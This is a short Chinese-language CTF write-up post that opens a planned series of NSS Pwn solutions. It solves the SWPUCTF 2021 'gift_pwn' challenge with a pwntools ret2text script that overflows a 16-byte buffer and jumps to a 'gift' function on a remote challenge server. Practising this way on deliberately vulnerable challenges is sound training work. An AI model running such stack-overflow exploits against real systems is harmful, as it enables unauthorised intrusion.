前言

本文章用于记录自己在 NSS Pwn 方向刷的百题题解,从简单 ret2text 题到困难 libc 题皆有,可作为本地知识库使用

Pwn 环境搭建(pwndocker)

正文

[SWPUCTF 2021 新生赛]gift_pwn

64 位,无保护,ida 打开看到 gift 在 0X4005B6,buf 大小为 16,故填充 16+8(对齐)位后接 gift

1
2
3
4
5
6
from pwn import *
p = remote('node1.anna.nssctf.cn',28025)
gift = 0X4005B6
payload = b'a'*(16+8)+p64(gift)
p.sendline(payload)
p.interactive()

ls 并 cat flag